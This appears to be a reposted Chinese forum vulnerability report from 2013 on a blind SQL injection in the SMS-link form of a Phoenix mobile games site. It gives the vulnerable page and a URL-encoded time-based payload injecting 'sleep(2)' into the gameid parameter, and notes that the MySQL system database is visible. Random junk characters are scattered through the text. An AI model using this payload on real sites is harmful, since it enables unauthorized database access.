简要描述:- I h y' O) w9 [% i
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
5 D* Y+ @! U6 j7 @" r6 ?. I2 ]6 F: b, p/ L1 G. G+ n/ ]; Y
详细说明:. V8 W- B# s' e. j2 J! Y: g
存在SQL盲注url:
* f9 c( k# t4 ]! V, }fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
+ c1 b" }9 g* w* whttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png8 L: |! @7 m4 M( m s4 W# X+ u G3 s
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
& y: l3 Y/ X9 r( j3 b1 ^: o& whttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
" T o$ H, ?$ ^' \' L5 o6 r! {+ M: U' @- l( [' V1 R& v8 u1 o: s
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对